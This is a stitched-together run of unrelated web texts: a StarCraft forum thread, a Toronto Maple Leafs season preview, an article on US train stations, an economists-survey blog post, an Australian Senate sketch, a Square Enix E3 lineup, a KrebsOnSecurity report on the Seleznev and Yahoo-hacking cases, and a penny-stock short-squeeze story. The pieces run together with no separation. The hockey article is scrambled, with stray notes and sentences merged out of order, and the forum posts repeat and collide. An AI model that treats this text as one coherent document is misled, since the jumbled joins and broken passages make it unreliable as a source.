sOda~ Profile Joined April 2011 United Kingdom 441 Posts Last Edited : 2012-03-06 20:57:28 # 7 On March 07 2012 05:56 Intact wrote :
Show nested quote +
On March 07 2012 05:54 0ne wrote :
Pretty sure it 's Bisu
If thats correct its both awsome and really sad at the same time . If thats correct its both awsome and really sad at the same time .
the blur kinda makes it look like him , doubt it is though , wouldnt make sense the blur kinda makes it look like him , doubt it is though , wouldnt make sense IM THE SHIT BITCH
Talack Profile Joined September 2010 Canada 2673 Posts # 8 BW players would never disgrace themselves by even being seen with sc2 players . You should be ashamed for even suggesting this . I 'm taking my rage to the unimpressed flash meme thread . ( jk ^^ )
Did anyone else notice McLoving on the far right ?
DeadBull Profile Joined August 2011 420 Posts # 9 YongHwa ?
i heard hes like rly shy .
when fenix made a teamhouse-tour he did even hide his face oO
Fionn Profile Blog Joined October 2009 United States 20365 Posts # 10 On March 07 2012 05:55 dragonborn wrote :
some random B-teamer .
Then why block out his face ? Then why block out his face ? Writer https : //twitter.com/FionnOnFire
Jono7272 Profile Joined November 2010 United Kingdom 6321 Posts # 11 I saw this earlier , was suspecting the same , rather strange ! Innovation | Flash | Mvp | Byun | TY
K_Dilkington Profile Joined June 2011 Sweden 445 Posts # 12 Looks a bit like Lyn . Common sense is the collection of prejudices acquired by the age of 18
IrOnKaL Profile Joined June 2011 United States 337 Posts # 13 They announced high chance of one more OSL , although they did not give an official date . So IDK why he would be there at the moment .
illidanx Profile Joined November 2011 United States 972 Posts # 14 On March 07 2012 05:57 Fionn wrote :
Show nested quote +
On March 07 2012 05:55 dragonborn wrote :
some random B-teamer .
Then why block out his face ? Then why block out his face ?
to make it look suspicious while in fact there is nothing special ? to make it look suspicious while in fact there is nothing special ? Die-hard KeSPA fan
Jono7272 Profile Joined November 2010 United Kingdom 6321 Posts # 15
From behind : Innovation | Flash | Mvp | Byun | TY
pallad Profile Joined September 2010 Poland 1713 Posts # 16 On March 07 2012 05:59 K_Dilkington wrote :
Looks a bit like Lyn .
Lyn dont have arm this size ..
I dont belive it what i just gon na write .. but he look 's like Flash for real : D Lyn dont have arm this size .. I dont belive it what i just gon na write .. but he look 's like Flash for real : D SC 2 -LingsLover- EU -- Jaedong , NesTea , Nerchio , DRG , Moon , Oz , Tarson , Scarlett -- Dota 2 Pallad EU- NaVi - LGD
BasilForSkin Profile Joined June 2011 United States 115 Posts # 17 From the most recent pictures of Bisu ( from yesterday actually , I think ) , the hair on the back of his head does not have exposed black roots , so I think that mostly rules him out . sup
Gihi Profile Joined September 2011 384 Posts Last Edited : 2012-03-06 21:04:30 # 18 On March 07 2012 05:54 BearDK wrote :
Well , if you look at what seems to be his monitor , you can tell that he is playing protoss .
edit : btw . you knowing stuff about the size of Flash ' arm is pretty disturbing to me Well , if you look at what seems to be his monitor , you can tell that he is playing protoss.edit : btw . you knowing stuff about the size of Flash ' arm is pretty disturbing to me
Good point .
And I know because I read his operation interview , has some pics of his arm recovering : D
Also why is his face blurred out ? If it was a regular sc2 player being recruited they would have just announced it like they did with Fenix ? Good point.And I know because I read his operation interview , has some pics of his arm recovering : DAlso why is his face blurred out ? If it was a regular sc2 player being recruited they would have just announced it like they did with Fenix ?
disciple Profile Blog Joined January 2008 8832 Posts # 19 no chance its bisu or flash . why would they wear IM uniform ? Administrator `` I 'm a big deal . '' - ixmike88
MeFAT Profile Joined March 2012 17 Posts # 20 A Korean team having an additional Code B player is nothing . Many unknown players enter and drop out of the teams on a daily basis . Just look at the FXO roster on IPL team league thread . They have like 20 players with a ton of new faces .
1 2 3 4 5 19 20 21 Next All
Rejoice ! The lockout is over .
Teams now have only a short period of time to get their rosters settled before a sprint to the playoffs .
And you only have a short period of time to get pumped up for hockey 's glorious return ! I know you 've already forgotten all about your empty promises to never watch hockey again , so what better way to get ready than to read the five reasons to be optimistic , pessimistic , and realistic about the 2013 Toronto Maple Leafs .
Reasons to be Optimistic
1 . Goals
The Leafs finished 10th in goals last season and added James van Riemsdyk in the off-season . Sure , his career goals per game pace produces slightly less than 20 over a full season , but he 's a semi-recent second overall pick , and if you ca n't get optimistic about that then you really are n't a true ( delusional ) Leafs fan .
It should be noted that the Leafs finished between 9th and 11th in scoring the first four years after the lockout and never made the playoffs either . Sorry , trying to be optimistic here and it clearly is n't working . I 'll try again . Goals ! We got 'em .
2 . Cap space
The Leafs also have a bunch of dead money coming off the books after the season ( $ 8.25 million between Tim Connolly and Matthew Lombardi alone ) , giving them flexibility in resigning Joffrey Lupul and/or going after some of the big name free agents ( i.e. , Corey Perry and Ryan Getzlaf ) .
3 . Roberto Luongo
Every rumour has the talented netminder coming to Toronto once the lockout ends . That would give the team the first real stability ( disregarding James Reimer 's non-concussed stint ) in what feels like a century .
In between the lockouts , Luongo was fifth among full-time starters in save percentage ( .919 ) , second in wins ( 259 ) , third in games played ( 461 ) , 11th in GAA ( 2.45 ) , and third in shutouts ( 37 ) . He 's elite .
With Luongo , the Leafs transforms from a lottery team into a potential playoff contender .
But if the Leafs do n't land Luongo ... well , just wait until you get to the Reasons to be Pessimistic .
4 . ( Semi ) Wide-open East
Florida : The Panthers were last year 's three seed , despite finishing with only one more regulation/overtime win than the Maple Leafs . The only difference between the two teams was the Panthers ' ability to win a couple extra times in the shootout and gain eight additional loser points for overtime losses . Additionally , the Panthers owned the worst goal-differential of any playoff team since the 1996-97 Montreal Canadiens . There is definitely some regression in order as playoff teams with a negative goal differential have missed the playoffs the next year 60 % of the time in between the last two lockouts .
New Jersey : On average over the last seven years , teams that lose in the Stanley Cup final drop six points in the standings the next year , something which should not comfort Devils fans . Dropping from 102 to 96 points would still make the Devils a playoff team , but they lost their best two-way player , Zach Parise , have four of their top 10 scorers older than 34 , and have an old Martin Brodeur in net , making a six-point drop seem conservative .
Washington : The Capitals lost offensive firepower in the way of Alex Semin ( although he was trending down ) and Dennis Wideman ( although he ca n't play defence ) , replacing them with ... Joey Crabb and Wojtek Wolski . A healthy Nicklas Backstrom could be a cure-all , especially for Alex Oveckin 's puzzling , rapid decline , but this team looks like a shell of the Eastern Conference powerhouse they were a few years ago .
That makes four attainable playoff spots ( or three if I begrudgingly include the Sens in the quality teams category ) . Massive improvements to Carolina likely make them a playoff team , but no one else took a huge step forward in the off-season , making Toronto 's competition with other bad teams less fierce .
5 . Shortened Season
The Leafs fell apart last season after 53 games , going 7-18-4 down the stretch . Well , that should n't
be a problem
this season
because there wo n't be more than 50 games .
Reasons to be Pessimistic
1 . Questions in goal
If there 's no Luongo , what version of Reimer will be taking over the No . 1 duties ? If it 's Concussy McMush-head , say hello to the lottery .
2 . Improvements ? We do n't need any stinkin ' improvements
Besides trading for James van Riemsdyk and signing Jay McClement , the Leafs had a very quiet offseason . JVR should help with secondary scoring—a major concern if Nikolai Kulemin ca n't rebound or Joffrey Lupul and Phil Kessel regress—and McClement should help on the penalty kill ( he certainly ca n't make it worse ) , but it is unlikely that either move is the secret to finally making the playoffs .
Any improvement will have to come from within ( barring a Luongo trade ) . Nazem Kadri , James Reimer/Ben Scrivens , Korbinian Holzer , and Matt Frattin are the youngsters tasked with improving a lottery team . That does n't inspire confidence .
3 . Special teams
4 . Where them goals at ?
Some of the blame can lie with the power play , which went amiss during the latter part of the season , thanks in no small part to John-Michael Liles ' concussion . With Liles at the beginning of the year , the Leafs power play was a scorching 20.32 % ( top 5 in the league ) . The unit dropped to 18.86 % when Liles missed time with a concussion ( still top 10 in the league ) , but plummeted to 15.38 % once Liles returned from injury and played like he just had a concussion ( bottom 10 in the league ) .
Liles is n't a strong defender , so if he ca n't quarterback the power play his value is dramatically reduced . And since coming back from a concussion is no sure thing , who knows how he will perform this season . is n't a strong defender , so if he ca n't quarterback the power play his value is dramatically reduced . And since coming back from a concussion is no sure thing , who knows how he will perform this season . Good thing he signed a new four-year deal ...
5 . History
The Leafs have n't made the playoffs since 2004 , and under Burke have been more likely to wind up in the lottery than anywhere near the playoffs . Last year the team looked like it was on its way to becoming a quality group , getting everyone 's hopes up , then crashed horrifically . Until the Leafs are actually in the playoffs , be extremely guarded . Even if up 10 points on the last day of the season do n't rule out an asteroid hitting Earth .
Reasons to be realistic
1 . Young pups
The Leafs are once again one of the youngest teams in the league , and although that comes with growing pains , it can also be of benefit during a lockout year . If the league tries to cram as many games as it can in as little time as possible , young , fresh legs should be the ones that are able to handle the abuse .
2 . Big seasons , bust finish
Last season , Phil Kessel scored the most points by a Leaf since Mats Sundin notched 83 in 1998-99 . Joffrey Lupul , despite missing 16 games , had a career year with more than a point per game , and finished just outside the top 25 in points . And Dion Phaneuf had his best season as a Maple Leaf—he notched his highest point total since 2008-09 and rediscovered the physicality that made him one of the league 's most feared defenceman .
Three strong contributions from three of
Toronto 's
best players and the team still finished in the lottery . If Toronto has n't found an answer in net and any of those three tail off this season , cue the arguments over whether Nathan MacKinnon or Seth Jones should be used with the first overall pick .
3 . Rusty
The Leafs only had five roster players playing overseas , while some Eastern Conference teams had as many as 11 . The Leafs are n't too far off from the average in the East ( 6.5 players ) , but will still be one of the rustier teams .
to be with the big club ( whenever he overcomes his `` whiplash '' ) , and there is a case for Nazem Kadri , Matt Frattin , Korbinian Holzer , Paul Ranger , and Mike Kostka wo n't be as battle ready as some of the clubs they will be fighting for a playoff spot . There will be some help from the farm , but most of the players are complimentary pieces . Jake Gardiner is a lockwith the big club ( whenever he overcomes his `` whiplash '' ) , and there is a case foras well , but the team as a wholeas battle ready as some of the clubs they will be fighting for a playoff spot .
Conversely , maybe starting with fewer players who played overseas and in the minors will be a blessing in disguise . Perhaps the Leafs will avoid some injuries ( nagging or major ) that may limit some other squads .
4 . Small Sample Size
With a short season a lot of wacky things can happen . Phil Kessel shooting 25 percent ? Sure , why not . Dion Phaneuf playing like a Norris Trophy calibre defenceman ? I 've seen stranger things . How about a Brian Elliott season from Ben Scrivens ? Anything is possible .
Essentially , with no time to regress to the mean there will be absolute chaos and the laws of the universe will be rendered obsolete . Muhahahaha !
5 . PLAYOFFS ! ! ! 1 !
Unlike other teams that spent wildly this off-season , the Leafs will have themselves some cap space ( currently $ 6.7 million , although that is subject to change based on who makes the team out of camp ) .These two facts combined mean the Leafs are in a good position to make moves and improve the team . Which leads to ... Over the past seven years , two to three teams that make the playoffs one year fail to make it the next.The top teams in the East—New York , Boston , Pittsburgh , Philadelphia—should still be good , but there is less certainty among the other four playoff teams from last season . : I never saw the Senators being good last season and I 'll be damned if I see it now . What 's that ? They have a No . 1 centre , defenceman , and goalie ? Shut up , observation ! James Reimer pre-concussion : 43 games , .920 SV % ; James Reimer post-concussion : 28 games , .898 SV % .Just for fun , here 's some more pessimism : Reimer 's monthly save percentage in his career is 1.000/.932/.926/.913/.909/.912/.895/.857/.901/.905 . I do n't like that trend line.The team 's most pressing needs went unfilled . The Leafs failed to land a No . 1 goalie , a No . 1 centre , and made no improvements to a defensive unit that was already near the league basement in goals allowed.How is this still an issue ? The penalty kill ranked third last in the league at 77.3 % in 2011-12 , which is somehow even worse than the year before . Not even random variance can make this horrible penalty kill improve.There 's no use beating a dead horse here . This is the second biggest concern next to the goaltending . If the Leafs do n't find a way to limit the damage short-handed , they wo n't make the playoffs . It 's really that simple.Once Randy Carlyle took over and pointed out the defensive zone on a map , the Leafs suddenly lost the ability to score . With Carlyle , the Leafs dropped from 2.98 goals per game ( fourth in the league ) to 2.22 ( 29th in the league ) .Was the Leafs ' early season goal-scoring binge a mirage ? The product of having absolutely no defensive responsibility ? For a team that is already going to have trouble making the playoffs , starting with fewer players in game-ready condition will be trouble.If Donald Audette can score the second most game-winning goals in the lockout shortened 1994-95 season then surely someone like Clarke MacArthur can be among the league leaders in some category.Sorry , felt like that sentence deserved a maniacal laugh.You 're a Leafs fan , if you 're being realistic about the season you are n't trying hard enough .
Editor 's note : with this two-part article , we close out our `` A Year in America '' series . Our thanks to Deepa Sanyal , Kathy Trauger , and Anita Rasmussen for their contributions . All of their articles can be accessed through the sidebar on the left .
`` … Now a train is often only a whistle heard far off on a sleepless night…the whistle announces a return and change to those who listen. ” -- John Stilgoe , Train Time : Railroads and the Imminent Reshaping of the United States Landscape
Washington 's Union Station , 1980 . A great white mausoleum , echoing , empty , way station to the capital 's real sights . Forward to 2012 and Union station is , according to Travel & Leisure magazine , the third most visited tourist attraction in the country , with 36,500,000 visitors .
Likewise , Grand Central Terminal in New York City is America 's fifth most visited tourist destinations with 21,600,000 visitors a year . People come to these beautifully restored Beaux Arts gems not just to catch a train , but to meet , eat , shop , and people watch in the stations ' grand arcades and concourses .
You never know what can happen in Grand Central Terminal -- just watch the short video below .
Are we experiencing a resurgence of rail when trains linked farms , small towns , and cities catalyzing economic and geographic expansion -- a time when train stations were the community 's crossroads , from the “ … mundane to the momentous ” ?
Not quite yet , but demand for intercity passenger rail is growing . Amtrak has set a new ridership record with 2013 being its best year ever at 31.6 million passengers . John R. Stilgoe of Harvard University writes that the convergence of globalization , congestion , energy prices , and discomforts of air travel has driven a renewed interest in the role of rail for both passengers and freight .
Investing in Train Stations
Train stations represent an important part of many communities ' history , culture , and civic pride . ... Since the late 1980s , cities and towns across the country have been investing in the renovation of their train stations .
An often overlooked lure of train travel is the historic train station . Train stations have served as romantically infused settings for novels , movies , and , for many of us , our own lives . Ed McMahon , a senior fellow at the Urban Land Institute , has pointed out that “ public buildings and spaces create identity and a sense of place . They give communities something to remember and admire. ” Train stations , like courthouses and libraries , are at the heart of our communities .
Reiterating the sentiment , Amtrak describes historic train stations , perhaps a bit floridly , as architectural expressions of our growth as a nation , and of our core values and beliefs . But certainly train stations represent an important part of many communities ' history , culture , and civic pride .
Since the late 1980s , cities and towns across the country have been investing in the renovation of their train stations , restoring and reinventing them as retail and entertainment destinations , convention centers , and museums -- which in turn have sparked the revitalization of surrounding neighborhoods .
But , it should be said , these stations have often been more entertainment & retail destinations than transit hubs , with no significant uptick in ridership or trains .
Rail-Centric Projects
This may be changing , however , as in the past decade federal grants for rail station projects have focused on transportation uses . Active Amtrak railroad station projects are up , in both big-cities and smaller towns , reflecting the surge in passenger travel . Renovated train stations of the near future will function as integrated , intermodal transportation centers -- while retaining entertainment and retail uses within and creating new urban neighborhoods without .
Two prime examples of the 21st century rail-centric stations are Washington , DC 's Union Station and Miami , Florida 's multi-modal station complex .
A new master plan for Washington 's Union Station will double its capacity for trains ; provide improved infrastructure and operations ; [ and ] triple passenger capacity to over 42 million by 2039 .
A new master plan for Washington 's Union Station will double its capacity for trains ; provide improved infrastructure and operations ; triple passenger capacity to over 42 million by 2039 ; create critical station space on multiple levels ; and serve as a transfer point for local and regional transit .
Real estate firm Akridge is slated to build Burnham Place , a three million square feet , multi-level office , residential , hotel , and retail facility , atop the existing platforms and rail yards , while creating new street networks , parks , public spaces , and neighborhood connections around Union station .
Nearly one thousand miles to the south , in Miami , Florida , a new rail complex is being planned to accommodate privately owned All Abroad Florida 's planned 32 daily high speed rail trains between Miami , Fort Lauderdale , and West Palm Beach . The Miami station complex will include a 400,000 sq . ft. transportation hub , along with nearly three million square feet of mixed use , transit oriented development -- hotels , residences , retail , entertainment .
On empty lots around the station , developers will build two mammoth hotels , 400 apartments , a million square feet of retail , and a 600,000 square foot convention center . The stations and their corollary real estate development are set to transform their surrounding neighborhoods into live-work-play urban environments and centers of economic prosperity .
The Nexus Between Rail Projects and Downtown Real Estate Development
Do real estate developments in and around train stations usurp land that could be used to build rail infrastructure -- tracks , platforms , junctions -- for more trains and passengers ? Sean Jeans Gail , Vice President of the National Association of Passenger Rail thinks the rail/real estate land use nexus depends on location . Presumably , where land is expensive , real estate is a more valuable investment than rail as it brings in more profits than train tickets .
Washington , DC 's Union Station is balancing rail versus real estate land use by allowing development within , below , and above the historic station footprint , while also constructing a new train shed , expanding the rail yard , re-activating multiple tracks , and leveraging the air rights for the Burnham Place transit-oriented development .
Continue to Part 2 of Rail Redux : What factors will drive a true rail resurgence ? Plus a look at how passenger rail is developing in North Carolina 's Triangle region .
As regular readers know , I funded a survey of over 500 economists to see which candidate for President of the United States has the most support from economic experts . I will publish the results in a press release and in this blog late next week unless something slows me down , such as getting assassinated .
Voters say the economy is the most important issue to them . Foreign affairs will keep dropping down the list of importance now that the current administration supports a timetable for withdrawal from Iraq . So how does a voter decide which candidate would be best for the economy ?
Yesterday Reuters/Zogby announced a poll that showed , among other things , which candidate the voters think would manage the economy better . This is like asking people who have hemorrhoids the best way to treat a brain tumor . Should n't we be asking brain surgeons ?
Forgive me for not caring what your grandma thinks of NAFTA . I want to know which economic policies seem best according to the majority of economists . I got tired of waiting for someone else to give me some useful information and decided to go get it myself . Democracy without useful information is random . This is n't a good time in history to be making random decisions .
I woke up this morning with the strange feeling that I might own the most important information in the world . Although 90 % of voters have made up their mind , the race is so tight that the remaining 10 % will settle things . If the media reports the results of my survey of economists , will it influence independent voters and thus the arrow of history ? Probably not . But you ca n't rule it out .
When I announce the results I will include all the disclaimers about its accuracy and usefulness , and there will be plenty . But if you ignore the opinions of 500 economists you are either a well-informed genius who needs no advice , or an idiot who does n't realize it would be helpful . ( Those two conditions feel exactly the same . ) For those in the middle , I would think you 'd care what the experts think .
It was a special kind of crazy that gripped the parliament on the last day of sitting before the budget .
To the left and to the right , brawling broke out in plain sight . At the heart of the discontent were two matters : the Senate voting changes agreed on by the Coalition and the Greens and the rumbling ideological warfare within the government .
Everyone knew Thursday was going to be a long day . A waft of toast signalled its beginning outside the president 's office just after seven .
The government had threatened that the Senate would sit until the voting reforms passed the house . Between the Coalition and the Greens , they had the numbers so there was never a question as to how it would end .
But no one was going down without a fight . The resulting vitriol spilled over in the chamber . In the first of many votes , the Greens crowded straight-faced , squashing uncomfortably up against the Nationals senators .
The 'feral ' Senate : how often do the crossbenchers actually vote against the government ? Read more
They waved at the schoolkids as all hell broke out on the Labor benches , hurling insults and accusations of betrayal and bad faith . “ What a coward , ” Penny Wong shouted to Richard Di Natale . “ Voting with Cory Bernardi . ”
Bernardi meanwhile , like some six-and-a-half-foot bunny , was delivering tiny Easter eggs around the halls .
It was only midday when the immigration minister , Peter Dutton , called a press conference in the blue room . He wanted to talk about boat turnbacks : two , in fact , in recent weeks . “ We stopped the boats , ” he said while noting 25 boats in all had been turned around under the Coalition . Syrian refugees were being processed : 1,600 visas issued , 9,000 under assessment .
But no one much had time to stay . The Greens were in the Senate courtyard , pointing out Labor 's “ hypocrisy ” for voting against marriage equality – after Labor had pointed out the Greens “ hypocrisy ” for voting against marriage equality . Pork sizzled in the next courtyard .
Diving into the middle , like a human time bomb , was the sweaty-faced Queensland Nationals MP George Christensen . The Newman of the parliament , Christensen decked the halls offering his views on the Safe Schools program .
Legend has it that 43 Coalition MPs signed his petition for a review before someone “ lost it ” . Perhaps among their files , Cory offered . Noted marriage equality campaigner Warren Entsch managed an audio shrug in his interview with Fran Kelly .
“ It seems to have disappeared , ” Entsch said .
Christensen shambled down the pink corridors of the press gallery to a doorstop clutching a can of Coke Zero . The presser ended with George 's views on sexuality .
“ I did n't say it was a choice , I said people could choose if they want. ” No one knew what he meant .
He single-handedly managed to suck all the oxygen out of the Nationals ' wins on competition policy and the backpacker tax review . No one knew if he cared .
Everything you do n't understand about senate voting reform ( and are afraid to admit ) | Van Badham Read more
As question time began , Fairfax journalists walked out on strike in protest against 120 job cuts . The former Labor treasurer Wayne Swan was named and banned from the chamber for 24 hours . His colleague Stephen Conroy played Candy Crush while heckling the defence minister , Marise Payne .
But still the day hurtled on , though the valedictory speeches from the former minister Ian Macfarlane , the former Labor minister and party secretary Gary Gray and the bubbling Bruce Billson , with the latter giving helpful advice .
“ You try to do useful things with the air you suck in , ” Billson told the chamber . Some of us wondered if we were .
As proof that Billson is no prophet , the Senate went on . And on . And on . Amendments continued . The Liberal senator Ian Macdonald mentioned the colour of someone 's socks . Labor 's Senate leader , Penny Wong , railed . And railed . The communications minister , Mitch Fifield , blustered and blew . It was like the eyeball torture scene from A Clockwork Orange . Then phones went down . The sun set and a quorum was called .
I ca n't tell you how this story ends but it is nothing that a good sleep ca n't fix . And when you wake , the Senate will likely have a whole new voting system .
Square Enix announces E3 2011 lineup
Square Enix is bringing a great amount of heavy-hitters to E3 this year , headlined by titles like Final Fantasy XIII-2 , Deus Ex : Human Revolution , and Tomb Raider .
Alongside Dead Island ( PS3 , 360 , PC ) , which Square Enix is distributing in America for Deep Silver , and Wakfu ( PC ) , Square Enix 's lineup includes the following titles :
Deus Ex : Human Revolution ( PS3 , 360 , PC ) – August 23 , 2011 – playable
Deus Ex : Human Revolution marks the return of the most critically acclaimed video game franchises of all time . The year is 2027 – a time of great innovation in neuroprosthetics , but also a time of chaos , conspiracy and a new social divide . Adam Jensen , a man cybernetically augmented against his will , finds himself in the middle of a mysterious global plot to which he holds the key . By offering players the chance to advance through the game in multiple and different ways , Deus Ex : Human Revolution challenges the foundations of gaming and provides an immersive experience , where every choice has a lasting consequence .
Dungeon Siege III ( PS3 , 360 , PC ) – June 21 , 2011 – playable
As one of the few remaining members of the 10th Legion , disgraced protectors of the land of Ehb , it is up to you to rebuild the once-great Legion and stop the land from falling into darkness . Joined by a group of unique companions , you will travel through a compelling world , defeating all manner of villains and beasts through a combination of heroic abilities , screen-shaking magic and pure cunning .
Dungeon Siege III seamlessly blends intuitive action gameplay , a robust RPG system featuring a large selection of abilities and loot , an extensive multiplayer component , and Obsidian Entertainment 's signature storytelling .
Final Fantasy XIII-2 ( PS3 , 360 ) – this Winter – playable
Set a few years after Lightning and the others saved Cocoon , some survivors have decided to start over by rebuilding on Gran Pulse . Lightning , however , is nowhere to be found and thought dead by many , but Serah believes otherwise . When her town is suddenly overrun by monsters , a mysterious man named Noel appears to save her . Together , the two set off to find Lightning…
Final Fantasy XIII-2 is the follow-up to the 2010 hit title , Final Fantasy XIII , and the latest installment in the world-renowned Final Fantasy series , which has shipped over 97 million units worldwide . Final Fantasy XIII-2 features an all-star production staff including producer Yoshinori Kitase , director Motomu Toriyama , character designer Tetsuya Nomura and art director Isamu Kamikokuryo .
Heroes of Ruin ( 3DS ) – early 2012 – playable
Brand-new for Nintendo 3DS , Heroes of Ruin tasks players with lifting a deadly curse from Ataraxis , ruler of the city of Nexus…
Four mercenaries , each with their own strengths , weaknesses and motivations , answer the call . These unlikely heroes can choose to create a fearsome alliance or venture forth from the city alone . Beyond the safety of the city the land is filled with strange and dangerous creatures , but none as deadly as the evil force behind the curse , which the heroes must eventually confront and destroy .
Hitman : Absolution ( PS3 , 360 , PC ) – 2012
Hitman : Absolution follows cold-blooded assassin Agent 47 as he takes on his most dangerous contract to date . Betrayed by those he once trusted , and hunted by the police , he suddenly finds himself at the center of a dark conspiracy and must embark on a journey through a corrupt and twisted world .
Showcasing IO Interactive 's new proprietary Glacier 2 technology , the game has been built from the ground up . Boasting a cinematic story , distinctive art direction and highly original game design , Hitman : Absolution combines much-loved classic gameplay with features never seen before in the Hitman franchise .
Tomb Raider ( PS3 , 360 , PC ) – 2012
Tomb Raider delivers an intense and gritty story of the origins of Lara Croft and her ascent from frightened young woman to hardened survivor , armed with only raw instincts and the physical ability to push beyond the limits of human endurance .
Superb physics-based gameplay is paired with a heart-pounding narrative in Lara 's most personal , character-defining adventure to date .
Roman Seleznev , a Russian man who is already serving a record 27-year sentence in the United States for cybercrime charges , was handed a 14-year sentence this week by a federal judge in Atlanta for his role in a credit card and identity theft conspiracy that prosecutors say netted more than $ 50 million . Separately , a Canadian national has pleaded guilty to charges of helping to steal more than a billion user account credentials from Yahoo .
Seleznev , 33 , was given the 14-year sentence in connection with two prosecutions that were consolidated in Georgia : The 2008 heist against Atlanta-based credit card processor RBS Worldpay ; and a case out of Nevada where he was charged as a leading merchant of stolen credit cards at carder [ dot ] su , at one time perhaps the most bustling fraud forum where members openly marketed a variety of cybercrime-oriented services .
Seleznev 's conviction comes more than a year after he was convicted in a Seattle court on 38 counts of cybercrime charges , including wire fraud and aggravated identity theft . The Seattle conviction earned Seleznev a 27-year prison sentence — the most jail time ever given to an individual convicted of cybercrime charges in the United States .
This latest sentence will be served concurrently — meaning it will not add any time to his 27-year sentence . But it 's worth noting because Seleznev is appealing the Seattle verdict . In the event he prevails in Seattle and gets that conviction overturned , he will still serve out his 14-year sentence in the Georgia case because he pleaded guilty to those charges and waived his right to an appeal .
Prosecutors say Seleznev , known in the underworld by his hacker nicknames “ nCux ” and “ Bulba , ” enjoyed an extravagant lifestyle prior to his arrest , driving expensive sports cars and dropping tens of thousands of dollars at lavish island vacation spots . The son of an influential Russian politician , Seleznev made international headlines in 2014 after he was captured while vacationing in The Maldives , a popular destination for Russians and one that many Russian cybercriminals previously considered to be out of reach for western law enforcement agencies .
However , U.S. authorities were able to negotiate a secret deal with the Maldivian government to apprehend Seleznev . Following his capture , Seleznev was whisked away to Guam for more than a month before being transported to Washington state to stand trial for computer hacking charges .
The U.S. Justice Department says the laptop found with him when he was arrested contained more than 1.7 million stolen credit card numbers , and that evidence presented at trial showed that Seleznev earned tens of millions of dollars defrauding more than 3,400 financial institutions .
Investigators also reportedly found a smoking gun : a password cheat sheet that linked Seleznev to a decade 's worth of criminal hacking . For more on Seleznev 's arrest and prosecution , see The Backstory Behind Carder Kingpin Roman Seleznev 's Record 27-Year Sentence , and Feds Charge Carding Kingpin in Retail Hacks .
In an unrelated case , federal prosecutors in California announced a guilty plea from Karim Baratov , one of four men indicted in March 2017 for hacking into Yahoo beginning in 2014 . Yahoo initially said the intrusion exposed the usernames , passwords and account data for roughly 500 million Yahoo users , but in December 2016 Yahoo said the actual number of victims was closer to one billion ( read : all of its users ) .
Baratov , 22 , is a Canadian and Kazakh national who lived in Canada ( he 's now being held in California ) . He was charged with being hired by two Russian FSB officer defendants in this case — Dmitry Dokuchaev , 33 , and Igor Sushchin , 43 — to hack into the email accounts of thousands of individuals . According to prosecutors , Baratov 's role in the charged conspiracy was to hack webmail accounts of individuals of interest to the FSB and send those accounts ' passwords to Dokuchaev in exchange for money .
Baratov operated several businesses that he advertised openly online that could be hired to hack into email accounts at the world 's largest email providers , including Google , Yahoo and Yandex . As part of his plea agreement , Baratov not only admitted to agreeing and attempting to hack at least 80 webmail accounts on behalf of one of his FSB co-conspirators , but also to hacking more than 11,000 webmail accounts in total from in or around 2010 until his arrest by Canadian authorities .
Shortly after Baratov 's arrest and indictment , KrebsOnSecurity examined many of the email hacking services he operated and that were quite clearly tied to his name . One such business advertised the ability to steal email account passwords without actually changing the victim 's password . According to prosecutors , Baratov 's service relied on “ spear phishing ” emails that targeted individuals with custom content and enticed recipients to click a booby-trapped link .
For example , one popular email hacking business registered to Baratov was xssmail [ dot ] com , which for several years advertised the ability to break into email accounts of virtually all of the major Webmail providers . XSS is short for “ cross-site-scripting. ” XSS attacks rely on vulnerabilities in Web sites that do n't properly parse data submitted by visitors in things like search forms or anyplace one might enter data on a Web site .
In the context of phishing links , the user clicks the link and is actually taken to the domain he or she thinks she is visiting ( e.g. , yahoo.com ) but the vulnerability allows the attacker to inject malicious code into the page that the victim is visiting .
This can include fake login prompts that send any data the victim submits directly to the attacker . Alternatively , it could allow the attacker to steal “ cookies , ” text files that many sites place on visitors ' computers to validate whether they have visited the site previously , as well as if they have authenticated to the site already .
Baratov pleaded guilty to nine counts , including one count of aggravated identity theft and eight violations of the Computer Fraud and Abuse Act . His sentencing hearing is scheduled for Feb. 20 , 2018 . The aggravated identity theft charge carries a mandatory two-year sentence ; each of the other counts is punishable by up to 10 years in jail and fines of $ 250,000 , although any sentence he receives will likely be heavily tempered by U.S. federal sentencing guidelines .
Meanwhile , Baratov 's co-defendant Dokuchaev is embroiled in his own legal worries in Russia , charges that could carry a death sentence . He and his former boss Sergei Mikhailov — once deputy chief of the FSB 's Center for Information Security — were arrested in December 2016 by Russian authorities and charged with treason . Also charged with treason in connection with that case was Ruslan Stoyanov , a senior employee at Russian security firm Kaspersky Lab .
There are many competing theories for the reasons behind their treason charges , some of which are explored in this Washington Post story . I have my own theory , detailed in my January 2017 piece , A Shakeup in Russia 's Top Cybercrime Unit .
Tags : bulba , Dmitry Dokuchaev , Karim Baratov , Karim Taloverov , Kaspersky Lab , nCux , RBS Worldpay hack , Roman Seleznev , Ruslan Stoyanov , Sergei Mikhailov , Yahoo hack
Shares of KaloBios Pharmaceuticals Inc ( NASDAQ : KBIO ) surged more than 1,000 percent early Thursday morning .
( NASDAQ : KBIO ) surged more than 1,000 percent early Thursday morning . KaloBios announced that a group of investors ( led by notable biotech investor Martin Shkreli ) have acquired 50 percent of the outstanding shares .
A trader in Arizona named Joe Campbell created a GoFundMe account to help pay the $ 106,000 balance he owes eTrade as his account was short the stock .
In what could be an industry first , a trader is asking the general public via GoFundMe to help repay a balance of $ 106,445.56 he owes eTrade because his account was short a penny stock that just surged more than 900 percent .
Campbell 's eTrade balance prior to his account blow up was around $ 37,000 .
Shares of KaloBios Pharmaceuticals skyrocketed after the company announced after Wednesday 's market close that a group of investors , led by notable biotech investor Martin Shkreli , had acquired more than 50 percent of the outstanding shares of the company .
See Also : Martin Shkreli Makes 1,080 % On Penny Stock Days After Company Said It Would Shut Down
According to Campbell 's GoFundMe , he felt that keeping a short position of KaloBios was a good strategy as he thought the stock would `` fade '' to $ 2.00 from the $ 2.07 it closed it . After all , the company did state earlier this month that it plans on winding down operations and any expectations of strategic alternatives were `` highly unlikely . ''
`` I got out of [ a ] meeting and saw a message from one of my buddy 's , he asked if I was ok since I was short KBIO , '' Campbell wrote after the stock began to surge late Wednesday afternoon . `` My heart dropped . `` Shoot did I blow up my account , everything I worked for ? I do n't want to lose all $ 37,000 that would be terrible . '' -- -It was much worse . ''
Campbell thought that the $ 16 print was a mistake . Once realizing it was no mistake , he called his broker who fully the exited the position at an average cost of $ 18.50 , leaving him with a negative balance of more than $ 106,000 – and a plea to the public for any sort of help .
